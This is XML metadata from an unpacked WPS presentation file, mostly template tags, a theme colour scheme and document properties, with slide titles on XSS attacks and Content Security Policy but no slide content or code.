  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_2*f*1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag25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77518_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom20180772_2"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="2"/>
  <p:tag name="KSO_WM_TEMPLATE_SUBCATEGORY" val="combine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4"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="a"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_2*a*1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1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440"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="f"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_2*f*1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag28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77518_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom20180772_2"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="2"/>
  <p:tag name="KSO_WM_TEMPLATE_SUBCATEGORY" val="combine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4"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="a"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_2*a*1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1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77518_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_TEMPLATE_SUBCATEGORY" val="combine"/>
  <p:tag name="KSO_WM_TEMPLATE_THUMBS_INDEX" val="1、4、5、6、12、13、19、25、31、32、33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440"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="f"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_2*f*1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag31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77518_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom20180772_2"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="2"/>
  <p:tag name="KSO_WM_TEMPLATE_SUBCATEGORY" val="combine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4"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="a"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_2*a*1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1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440"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="f"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_2*f*1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag34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77518_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom20180772_2"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="2"/>
  <p:tag name="KSO_WM_TEMPLATE_SUBCATEGORY" val="combine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4"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="a"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_2*a*1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1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440"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="f"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_2*f*1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag37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77518_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="custom20180772_2"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="2"/>
  <p:tag name="KSO_WM_TEMPLATE_SUBCATEGORY" val="combine"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772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TYPE" val="a"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1"/>
  <p:tag name="KSO_WM_UNIT_ISCONTENTSTITLE" val="1"/>
  <p:tag name="KSO_WM_UNIT_VALUE" val="13"/>
  <p:tag name="KSO_WM_UNIT_HIGHLIGHT" val="0"/>
  <p:tag name="KSO_WM_UNIT_COMPATIBLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="0"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="CONTENT"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1_1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_10*a*1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1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TYPE" val="l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_3_1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_10*l_h_i*1_3_1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="5"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1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TYPE" val="l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_4_1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_10*l_h_i*1_4_1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="5"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1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l_h_f"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_4_1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_UNIT_VALUE" val="22"/>
  <p:tag name="KSO_WM_UNIT_HIGHLIGHT" val="0"/>
  <p:tag name="KSO_WM_UNIT_COMPATIBLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="0"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT_INDEX" val="3"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT_LEN" val="17"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_10*l_h_f*1_4_1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_USESOURCEFORMAT_APPLY" val="1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l_h_f"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_3_1"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_UNIT_VALUE" val="22"/>
  <p:tag name="KSO_WM_UNIT_HIGHLIGHT" val="0"/>
  <p:tag name="KSO_WM_UNIT_COMPATIBLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_CLEAR" val="0"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT_INDEX" val="3"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT_LEN" val="17"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20180772"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="custom20180772_10*l_h_f*1_3_1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="13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Office 主题​​">
  <a:themeElements>
    <a:clrScheme name="82202">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="222A35"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E7E6E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="025B59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1463</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>92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Calibri</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Office 主题​​</vt:lpstr>
      <vt:lpstr>CSP 内容安全策略</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Cross-site scripting (XSS) 跨站脚本攻击</vt:lpstr>
      <vt:lpstr>XSS攻击案例</vt:lpstr>
      <vt:lpstr>Content Security Policy(CSP) 内容安全策略</vt:lpstr>
      <vt:lpstr>LOREM IPSUM DOLOR</vt:lpstr>
      <vt:lpstr>LOREM IPSUM DOLOR</vt:lpstr>
      <vt:lpstr>LOREM IPSUM DOLOR</vt:lpstr>
      <vt:lpstr>LOREM IPSUM DOLOR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满鸿</dc:creator>
  <cp:lastModifiedBy>满鸿</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-11-06T02:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-08T11:31:02Z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